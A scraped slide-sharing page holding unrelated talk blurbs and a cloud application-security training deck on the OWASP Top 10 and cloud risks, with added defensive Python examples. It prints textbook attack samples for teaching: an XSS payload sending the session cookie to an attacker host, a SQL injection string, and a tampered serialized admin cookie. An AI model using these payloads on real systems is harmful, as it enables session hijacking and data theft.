• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Key Trends Shaping the Future of Infrastructure.pdf – Cheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 preview – Prayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... – UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
DevOps and Testing slides at DASA Connect – Kari Kakkonen
My and Rik Marselis's slides from the 30.5.2024 DASA Connect conference. We discuss what testing is, then what agile testing is, and finally what Testing in DevOps is. Finally we had a lovely workshop with the participants, trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
2. DOMAIN 4 TOPICS
1. Recognize the need for training and awareness in application security
2. Understand cloud software assurance and validation
3. Use verified secure software
4. Comprehend the software development life-cycle (SDLC) process
5. Apply the secure software development life-cycle
6. Comprehend the specifics of cloud application architecture
7. Design appropriate identity and access management (IAM) solutions
3. 1. TRAINING AND AWARENESS
A. Cloud Development Basics
B. Common Pitfalls
C. Common Vulnerabilities (e.g., OWASP Top 10)
4. 1. TRAINING AND AWARENESS: DEFINITIONS
• Training: “The formal presentation of material, often delivered by internal subject matter experts. It addresses and explains matters of the organization’s policies, content mandated by regulation, and industry best practices for the organization’s field.”
• Education: “The formal presentation of material in an academic setting, often for credit toward a degree.”
• Awareness: “The additional, informal, often voluntary presentation of material for the purpose of reminding and raising attention among staff.”
5. 1. TRAINING AND AWARENESS: TRAINING CATEGORIES
• Initial training:
• Delivered when personnel first enter the employ of the organization
• Covers security policies and procedures all staff are expected to understand
• Examples of content: password policy, physical security, use of security credentials or tokens, how to report security concerns, acceptable use policy
• Best if done in person
• Recurring training:
• At least once per year
• Topics include updates to security practices and procedures, changes to regulations and policies, new elements in the infrastructure
• Refresher training:
• Given to personnel who need additional lessons (e.g., after an extended absence, a missed recurring training session, or a failed security practice)
6. 1A. CLOUD DEVELOPMENT BASICS
Cloud development and applications can differ from traditional/on-premises development (“forklifting” an application as-is is not always an option)
• Data sensitivity issues in the cloud (more on this later)
• Need to understand service models (e.g., IaaS, PaaS, SaaS) and the roles and responsibilities of each (each model places a different level of security responsibility on the customer)
• Need to understand deployment models (e.g., public, private, community, hybrid) and who is responsible for security controls in each
• Understand RESTful vs SOAP APIs (more on this later)
• Multitenancy – tenancy separation prevents data leaks between customers
• Application virtualization – running full applications in a protected space (e.g., WINE) (more later)
• Cryptography – be familiar with the different types, where each is used, and the use case for each (more later)
• Sandboxing – a protected area for testing untested and untrusted code (more later)
7. 1B. COMMON PITFALLS
• On-premises does not always transfer
• Not all apps are cloud-ready
• Lack of training and awareness
• Lack of documentation and guidelines
• Complexities of integration (use of secure, validated APIs)
• Multitenancy (tenancy separation)
• Third-party administrators
8. 1C. COMMON VULNERABILITIES (2017 OWASP TOP 10)
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using components with Known Vulnerabilities
10. Insufficient Logging and Monitoring
(More on these later)
9. 2. CLOUD SOFTWARE ASSURANCE AND VALIDATION
A. Cloud-based Functional Testing
B. Cloud Secure Development Lifecycle
C. Security Testing (e.g., SAST, DAST, Pen Testing)
10. 2A. CLOUD-BASED FUNCTIONAL DATA/TESTING
• “Functional data” refers to specific services your organization offers that have some form of legal implication (e.g., regulatory requirements, contractual requirements)
• Cloud providers are concerned with preventing customers from harming the cloud enterprise and from accessing any other customer’s data or operations
• The cloud provider may allow customers to monitor and test the data and behavior of the network to ensure appropriate security controls are in place
• Monitoring may include access to audit and performance logs, delivery of SIEM log data, deployment of a DLP solution, or access to a scaled-down, limited portion of the cloud environment that mimics the overall infrastructure
11. 2B. CLOUD-SECURE SOFTWARE DEVELOPMENT LIFECYCLE
• Several SDLC models:
• Waterfall
• Agile Development
• Spiral
• Others
• All SDLCs have steps similar to these:
• Planning and requirements analysis
• Defining
• Designing
• Developing
• Testing
• Maintenance:
• Operations (e.g., Puppet, Chef)
• Disposal
12. 2B. CLOUD-SECURE SDLC (CONT’D)
• For the cloud, best to use ISO/IEC 27034-1 (Information Technology – Security Techniques – Application Security):
• Organizational Normative Framework (ONF)
• Continuous improvement loop with the ANF: innovations resulting from securing a single application are returned to the ONF to strengthen all of the organization’s application security in future
• Application Normative Framework (ANF)
• Used in conjunction with the ONF, but created for a specific application
• Application Security Management Process (ASMP)
• Used to manage and maintain each ANF
• ONF to ANF is a one-to-many relationship (one ONF is used as the basis to create multiple ANFs)
• No official third-party certification process in place yet
13. 2C. APPLICATION SECURITY TESTING
• White-box testing vs black-box testing
• Static Application Security Testing (SAST) – white-box testing, usually used while the app is in development
• Dynamic Application Security Testing (DAST) – black-box testing, used while the app is running
• Runtime Application Self-Protection (RASP) – prevents attacks by reconfiguring automatically, without human intervention, in response to certain conditions
• Vulnerability assessments – usually a white-box test that identifies known vulnerabilities
• Penetration testing
• Secure code reviews
14. 2C. APPLICATION SECURITY TESTING (CONT’D)
• OWASP Recommendations:
• Identity management testing
• Authentication testing
• Authorization testing
• Session management testing
• Input validation testing
• Testing for error handling
• Testing for weak cryptography
• Business logic testing
• Client-side testing
• The chosen cloud deployment model (e.g., public vs private) may introduce new threat vectors over traditional deployment
15. 3. USE VERIFIED SECURE SOFTWARE
A. Approved API
B. Supply-Chain Management
C. Community Knowledge
16. 3A. APPROVED API
• APIs are a very important part of cloud applications, as this is the primary access method
• Two of the possible formats for cloud APIs are:
• Representational State Transfer (REST)
• Uses HTTP
• Supports many data formats (e.g., JSON, XML, YAML, etc.)
• Good performance and scalability, uses caching
• Widely used
• Stateless
• Simple Object Access Protocol (SOAP)
• Uses SOAP envelope around HTTP, FTP, or SMTP
• Only supports XML
• Slower performance, complex scalability, no caching
• Used where REST is not possible
• Stateful
17. 3A. APPROVED API (CONT’D)
• APIs are a means for a company to expose functionality to applications
• Benefits:
• Programmatic control and access
• Automation
• Integration with third-party tools
• Use of APIs can lead to leveraging insecure products outside corporate boundaries; there needs to be a formal approval process for all APIs
• To secure APIs, use SSL/TLS (REST) or message-level cryptography (SOAP), require access authentication, and log API usage; can also use OWASP’s Dependency-Check (to check for known vulnerabilities in dependencies)
18. 3B. SOFTWARE SUPPLY CHAIN MANAGEMENT
• More and more use of third-party software in the cloud
• The cloud has a highly dynamic software supply chain because so many applications have unknown software components and are developed using uncertain development processes
• Best if everyone produced software using the guidance defined in ISO/IEC 27034-1 (but there does not appear to be an official certification process yet)
• Would be great if orgs could access all code and services to verify proper and secure functioning regardless of source
19. 3C. COMMUNITY KNOWLEDGE
• Open source software
• Openly tested and reviewed
• Considered to be more secure than software that has not undergone community scrutiny
20. 4. COMPREHEND THE SDLC PROCESS
A. Phases and Methodologies
B. Business Requirements
C. Software Configuration Management and Versioning
22. 4B. SDLC BUSINESS REQUIREMENTS
• Cloud Providers’ business requirements include:
• Be profitable
• Ensure all customer needs are met (i.e., Contracts and SLAs)
• Cloud Providers’ primary security concerns:
• Physical Plant or data center (campus, physical components, services)
• Logical Framework (secure installation and configuration of virtual OSs & other elements)
• Networking (firewalls, IDS/IPS, honeypots, vulnerability assessments, communications)
• Mapping and selection of controls (usually per regulations)
• DDoS prevention
• Cloud Customers need to define cloud strategy before entering into agreement with CSP
• Organizational assets agreed upon and assessed for suitability for cloud
• Define suitable business units or functions
• Outline phased approach to cloud journey
• Document exceptions, restrictions, and risks
• List regulatory and compliance components (addressed either jointly or by the provider)
• List business and system interdependencies
23. 4C. SDLC SOFTWARE CONFIGURATION MANAGEMENT AND VERSIONING
• Carryover from on-premises: secure baseline configurations of the OS
• Create a secure OS baseline template to harden each new virtual machine deployment
• Exceptions should be approved by the change/configuration management process
• Version control for applications:
• Follow vendor recommendations
• Apply requisite patches and upgrades
• Ensure interoperability with the rest of the environment
• Document all changes and developments
24. 5. APPLY THE SECURE SDLC
A. Common Vulnerabilities (e.g., SQL Injection, XSS, XSRF, Direct Object Reference, Buffer Overflow) – discussed earlier
B. Cloud-specific Risks
C. Quality of Service
D. Threat Modeling
25. 5A. COMMON VULNERABILITIES (OWASP TOP 10 AGAIN)
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using components with Known Vulnerabilities
10. Insufficient Logging and Monitoring
26. 5A-1. INJECTION
• Definition: Occurs when an attacker can send hostile data to an interpreter as part of a command or query
• Impact: Can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, denial of access, or complete host takeover
• Example: An application uses untrusted data in the construction of the following vulnerable SQL call:
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
The attacker modifies the ‘id’ parameter value in their browser to send: ' or '1'='1. For example:
http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of the query to return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures.
27. 5A-2. BROKEN AUTHENTICATION
• Definition: Authentication and session management are implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens
• Impact: Attackers only have to gain access to a few accounts to compromise the system; results in money laundering, social security fraud, and identity theft
• Example: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are now viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and to use multi-factor authentication.
28. 5A-3. SENSITIVE DATA EXPOSURE
• Definition: Sensitive data is not properly protected
• Impact: Compromises regulated data such as PII, credentials, and credit card numbers
• Example: A site doesn't use or enforce TLS for all pages, or supports weak encryption. An attacker monitors network traffic (e.g., on an insecure wireless network), downgrades connections from HTTPS to HTTP, intercepts requests, and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above, they could alter all transported data, e.g., the recipient of a money transfer.
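The two response-header controls that break the downgrade-and-steal chain above are the Secure/HttpOnly/SameSite cookie attributes and Strict-Transport-Security. What follows is an added example, not code from the slides: a small audit that parses those headers and reports what is missing. The header values and cookie name are constructed for the example.

```python
# Added example, not from the slides: audit the two response headers that
# defeat the HTTPS-to-HTTP downgrade and cookie theft described above. The
# header values below are constructed for the example.

def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs

def audit_session_cookie(set_cookie_value):
    """Return the weaknesses found in one Set-Cookie header (empty list = OK)."""
    name, _, attrs = parse_set_cookie(set_cookie_value)
    findings = []
    if attrs.get("secure") is not True:
        findings.append(f"{name}: missing Secure (browser will send it over plain HTTP)")
    if attrs.get("httponly") is not True:
        findings.append(f"{name}: missing HttpOnly (readable by injected script)")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite should be Lax or Strict")
    return findings

def audit_hsts(headers):
    """Strict-Transport-Security makes the browser refuse to downgrade to HTTP;
    a one-year max-age is the usual minimum recommendation."""
    value = headers.get("Strict-Transport-Security", "")
    if not value:
        return ["missing Strict-Transport-Security header"]
    max_age = 0
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age" and val.strip().isdigit():
            max_age = int(val)
    if max_age < 31536000:
        return [f"HSTS max-age {max_age} is below one year"]
    return []

def audit_response(headers):
    """headers: dict of response headers (constructed samples below)."""
    return audit_session_cookie(headers.get("Set-Cookie", "")) + audit_hsts(headers)

# Constructed sample responses: the weak one is what the slide's site sends.
WEAK_RESPONSE = {"Set-Cookie": "JSESSIONID=2f0c8e2a; Path=/"}
HARDENED_RESPONSE = {
    "Set-Cookie": "JSESSIONID=2f0c8e2a; Path=/; Secure; HttpOnly; SameSite=Strict",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or "OK")
```

The same audit can be pointed at real responses by feeding it the headers a client library returns; HSTS only protects visitors after their first HTTPS visit, which is why preload lists exist, but that is outside this check.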
29. 5A-4. XML EXTERNAL ENTITIES (XXE)
• Definition: The XML processor evaluates external entity references within XML documents, which can be used to disclose internal files
• Impact: Can be used to extract data, execute a remote request from the server, scan internal systems, or perform a DoS attack
• Example: An attacker attempts a denial-of-service attack by including a potentially endless file
30. 5A-5. BROKEN ACCESS CONTROL
• Definition: Poorly enforced restrictions on what authenticated users are allowed to do, allowing attackers to access unauthorized functionality and/or data
• Impact: Attackers can act as users or administrators, and can create, access, update, or delete records
• Example: The application uses unverified data in a SQL call that is accessing account information:
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();
An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If the parameter is not properly verified, the attacker can access any user's account.
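The two SQL examples in this deck (5A-1 injection and 5A-5 broken access control) fail for different reasons, and the second one is already parameterised, which is the point: a prepared statement stops injection but says nothing about whose row is being read. The following is an added example, not code from the slides, showing both defects beside their fixes against an in-memory SQLite table that stands in for the deck's accounts table; the owner and balance columns and the sample rows are assumptions.

```python
import sqlite3

# Added example, not from the slides. An in-memory SQLite table stands in for
# the deck's "accounts" table; the owner/balance columns and rows are assumed.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 75)],
    )
    return conn

def vulnerable_lookup(conn, cust_id):
    """5A-1 as written on the slide: the request parameter is concatenated
    into the SQL text, so the interpreter parses whatever the client sent."""
    query = "SELECT custID, owner, balance FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def safe_lookup(conn, cust_id):
    """Parameterised query: the value travels separately from the SQL text
    and is never parsed as SQL, so ' or '1'='1 is just a string."""
    return conn.execute(
        "SELECT custID, owner, balance FROM accounts WHERE custID=?", (cust_id,)
    ).fetchall()

def authorized_lookup(conn, session_user, acct):
    """5A-5: parameterised AND bound to the authenticated user, so a forged
    'acct' parameter cannot reach another user's row. Returns None both when
    the row does not exist and when it belongs to someone else, so the
    response does not reveal which account numbers are valid."""
    return conn.execute(
        "SELECT custID, owner, balance FROM accounts WHERE custID=? AND owner=?",
        (acct, session_user),
    ).fetchone()

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_lookup(db, "' or '1'='1"))      # every row
    print("parameterised:", safe_lookup(db, "' or '1'='1"))         # []
    print("bob reads 1002:", authorized_lookup(db, "bob", "1002"))
    print("alice reads 1002:", authorized_lookup(db, "alice", "1002"))  # None
```

The ownership predicate belongs in the query (or in a data-access layer that every handler must go through) rather than in each controller, so that a forgotten check in one endpoint does not reopen the hole.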
31. 5A-6. SECURITY MISCONFIGURATION
• Definition: Insecure default configurations, incomplete configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages
• Impact: Often gives attackers unauthorized access to system data or functionality, and can result in a complete system compromise
• Example: A cloud service provider has default sharing permissions that leave storage open to the Internet and to other CSP users. This allows sensitive data stored within cloud storage to be accessed.
32. 5A-7. CROSS-SITE SCRIPTING (XSS)
• Definition: The application includes untrusted data in a new web page without proper validation or escaping, allowing attackers to execute scripts in the victim’s browser to hijack user sessions, deface web sites, or redirect the user to malicious sites
• Impact: Can result in stealing of credentials and sessions, or delivering malware to the victim
• Example: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in the browser to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
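The fix for the snippet above is output encoding matched to the context the data lands in, here a quoted HTML attribute. The following is an added example, not code from the slides: the same HTML built in Python first without and then with escaping, run against the slide's payload (the attacker host is replaced by the constructed name attacker.example).

```python
import html

# Added example, not from the slides: the slide's HTML snippet rendered in
# Python, first unescaped (as on the slide) and then with output encoding.
# XSS_PAYLOAD is the slide's payload with the host replaced by the constructed
# name attacker.example.

XSS_PAYLOAD = ("'><script>document.location="
               "'http://attacker.example/cgi-bin/cookie.cgi?foo='+document.cookie</script>'")

def render_vulnerable(cc):
    """5A-7 as written: untrusted data dropped into a single-quoted attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"

def render_escaped(cc):
    """Context-appropriate output encoding. The attribute is quoted, so
    quote=True matters: it turns ' into &#x27; and " into &quot;, and the
    browser decodes them back only as attribute text, never as markup."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"

def tag_count(rendered):
    """Number of '<' in the output; a correct render of one input has exactly one."""
    return rendered.count("<")

if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))   # three tags: the attacker's script runs
    print(render_escaped(XSS_PAYLOAD))      # one tag: the payload is inert text
```

Escaping is context-specific: html.escape is right for element bodies and quoted attributes, but data placed inside a script block, a URL, or a CSS value needs that context's encoder, and a templating engine with auto-escaping on by default removes the chance of forgetting the call.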
33. 5A-8. INSECURE DESERIALIZATION
• Definition: Serialization refers to the process of converting an object into a format which can be persisted to disk, sent through streams, or sent over a network (e.g., JSON, XML). Deserialization is the opposite.
• Impact: Can lead to remote code execution attacks, or allow replay attacks, injection attacks, and privilege escalation attacks
• Example: A PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:
a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
An attacker changes the serialized object to give themselves admin privileges:
a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
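The forum's cookie fails because the client can rewrite state that the server then trusts without checking. The following is an added example, not code from the slides: the same state serialized as plain JSON (no native object serialization) with an HMAC attached, so the edit the slide describes is detected before the state is used. The key, field names and the tampering helper are constructed for the example.

```python
import base64
import hashlib
import hmac
import json

# Added example, not from the slides: the forum's "super cookie" redone as
# JSON plus an HMAC, so an edit such as changing role to "admin" is detected
# before the state is trusted. SECRET_KEY and the state fields are
# constructed for the example; a real key comes from a secrets store.

SECRET_KEY = b"example-only-key-do-not-reuse"

def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def _unb64(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))

def sign_state(state, key=SECRET_KEY):
    """Serialize to canonical JSON (never pickle) and append HMAC-SHA256."""
    payload = _b64(json.dumps(state, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return (payload + b"." + _b64(tag)).decode()

def verify_state(token, key=SECRET_KEY):
    """Return the state dict if the MAC is valid, otherwise None."""
    try:
        payload, tag = token.encode().split(b".", 1)
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        # constant-time compare so the tag cannot be guessed byte by byte
        if not hmac.compare_digest(_unb64(tag), expected):
            return None
        return json.loads(_unb64(payload))
    except (ValueError, UnicodeDecodeError):
        return None

def tamper_role(token, new_role):
    """The edit the slide describes: rewrite the payload, keep the old tag."""
    payload, tag = token.split(".", 1)
    state = json.loads(_unb64(payload.encode()))
    state["role"] = new_role
    forged = _b64(json.dumps(state, sort_keys=True, separators=(",", ":")).encode())
    return forged.decode() + "." + tag

if __name__ == "__main__":
    token = sign_state({"uid": 132, "name": "Mallory", "role": "user"})
    print("valid:", verify_state(token))
    print("tampered:", verify_state(tamper_role(token, "admin")))   # None
```

Note that the signed state still carries no password hash, unlike the forum's cookie: a MAC stops tampering but does not hide the contents, so anything secret stays server-side and the cookie holds only an identifier or non-sensitive claims.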
34. 5A-9. USING COMPONENTS WITH KNOWN VULNERABILITIES
• Definition: Libraries, frameworks, and other modules with known vulnerabilities run with the same privilege as the application, which facilitates serious data loss or server takeover during a breach
• Impact: Some of the largest breaches have relied on exploiting new vulnerabilities
• Example: CVE-2017-5638, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant breaches.
35. 5A-10. INSUFFICIENT LOGGING AND MONITORING
• Definition: Insufficient logging and monitoring lengthens the time to detect breaches, allowing attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data
• Impact: Most successful attacks start with vulnerability probing. Allowing probes to continue raises the likelihood of successful exploitation.
• Example: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected, due to fraudulent card transactions reported by an external bank.
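The probing that the Impact line says precedes most successful attacks is visible in ordinary web server logs as a burst of 404s for paths no user types. The following is an added example, not code from the slides: a sliding-window detector over constructed Apache combined-format log lines that flags a client with many 404s in a short interval. The IP addresses, paths and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example, not from the slides: a minimal detector for vulnerability
# probing in web server logs, the early signal that 5A-10 says goes unwatched.
# The log lines below are constructed in Apache combined-log format.

LOG_LINES = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
198.51.100.9 - - [10/Oct/2023:13:55:40 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 512
198.51.100.9 - - [10/Oct/2023:13:55:41 +0000] "GET /.env HTTP/1.1" 404 512
198.51.100.9 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-login.php HTTP/1.1" 404 512
198.51.100.9 - - [10/Oct/2023:13:55:42 +0000] "GET /.git/config HTTP/1.1" 404 512
198.51.100.9 - - [10/Oct/2023:13:55:43 +0000] "GET /admin/ HTTP/1.1" 404 512
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /missing.png HTTP/1.1" 404 512
""".splitlines()

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+')

def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status)}

def detect_probing(lines, threshold=4, window_seconds=60):
    """Return {ip: total_404s} for clients with at least `threshold` 404s inside
    any window of `window_seconds`. Many distinct 404s within seconds is the
    signature of a scanner walking a wordlist, not of a person browsing."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[rec["ip"]].append(rec["time"])
    alerts = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = len(times)
                break
    return alerts

if __name__ == "__main__":
    print(detect_probing(LOG_LINES))   # {'198.51.100.9': 5}
```

A rule like this is only useful if someone is on the receiving end of the alert, which is the slide's real point: the retailer in the example had the detection and lacked the response.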
36. 5B. CLOUD-SPECIFIC RISKS
Application and data sensitivity and importance (mentioned previously):
• To determine the sensitivity and importance of an application you are considering putting into a cloud environment, ask yourself what the impact would be in the following situations:
• The data became widely public and widely distributed (including crossing geographic boundaries)
• An employee of the cloud service provider accessed the application
• The process or function was manipulated by an outsider
• The process or function failed to provide expected results
• The data was unexpectedly changed
• The application was unavailable for a period of time
37. 5B. CLOUD-SPECIFIC RISKS (CONT’D)
CSA Treacherous Twelve of 2016:
1. Data Breaches
2. Weak Identity, Credential and Access Management
3. Insecure Interfaces and APIs
4. System and Application Vulnerabilities
5. Account Hijacking
6. Malicious Insiders
7. Advanced Persistent Threats (APTs)
8. Data Loss
9. Insufficient Due Diligence
10. Abuse and Nefarious Use of Cloud Services
11. Denial of Service
12. Shared Technology Issues
38. 5B-1. DATA BREACHES
• Definition: An incident in which sensitive, protected, or confidential information is released, viewed, stolen, or used by an individual who is not authorized to do so
• Impact: The sensitivity of the data determines the extent of the damage; could involve fines, civil lawsuits, or criminal charges
• Example: The 2015 Anthem breach of more than 80 million customer records began with stolen credentials on the corporate network. A third-party cloud service was used to transfer the huge data store from the company’s network to the public cloud, where it could be downloaded by the hackers.
39. 5B-2. WEAK IDENTITY, CREDENTIAL, AND ACCESS MANAGEMENT
• Definition: Lack of scalable identity and access management systems, failure to use multifactor authentication, weak password use, lack of ongoing automated rotation of cryptographic keys, passwords, and certificates, and insecure storage of cryptographic keys
• Impact: Can enable unauthorized access to data and potentially catastrophic damage to organizations or end users
• Example: Attackers Scrape GitHub for Cloud Service Credentials, Hijack Account to Mine Virtual Currency – “Cloud service provider credentials included in a GitHub project were discovered and misused within 36 hours of the project going live.”
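Credentials reach public repositories because nothing between the editor and the push looks for them. The following is an added example, not code from the slides: a pre-commit style scanner that checks staged file contents for the AWS access key ID format and for generic secret assignments, returning hits that a hook would use to block the commit. The sample files are constructed; AKIAIOSFODNN7EXAMPLE and the matching secret are the placeholder credentials AWS uses in its own documentation, not real keys.

```python
import re

# Added example, not from the slides: a pre-commit style scan for cloud
# credentials, the control that would have caught the GitHub leak above.
# Patterns: the AWS access key ID format (AKIA + 16 upper-case alphanumerics)
# and a generic "secret = '...'" assignment. The sample files are constructed;
# the AWS values are the placeholders from AWS documentation, not live keys.

SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_secret_assignment": re.compile(
        r"(?i)(secret|password|api[_-]?key|access[_-]?key)\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}

def scan_text(path, text):
    """Return (path, line_number, pattern_name) for every line that matches."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((path, lineno, name))
    return hits

def scan_files(files):
    """files: {path: contents}. A non-empty result means block the commit."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_text(path, text))
    return hits

# Constructed staged files for the example.
SAMPLE_FILES = {
    "config/settings.py": (
        "DEBUG = False\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"
    ),
    "README.md": "Set AWS_ACCESS_KEY_ID in the environment, never in the repo.\n",
}

if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print("BLOCK: %s:%d matches %s" % hit)
```

A hook like this catches the common cases; the complementary control is on the provider side, where keys are short-lived and scoped so that a leaked one is worth little for the 36 hours the slide mentions.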
40. 5B-3. INSECURE INTERFACES AND APIS
• Definition: APIs and UIs are generally the most exposed part of a system, and will be the target of heavy attack
• Impact: Reliance on a weak set of interfaces and APIs exposes organizations to a variety of security issues related to confidentiality, integrity, availability, and accountability
• Example: The IRS Breach and the Importance of Adaptive API Security – “In mid-2015, the US Internal Revenue Service (IRS) exposed over 300,000 records via a vulnerable API (“Get Transcript”).”
41. 5B-4. SYSTEM AND APPLICATION VULNERABILITIES
• Definition: exploitable bugs in programs that attackers can use to infiltrate a computer system for the purpose of stealing data, taking control of the system, or disrupting service operations
• Impact: the costs of implementing protection are small in comparison to the costs of the damage they can cause
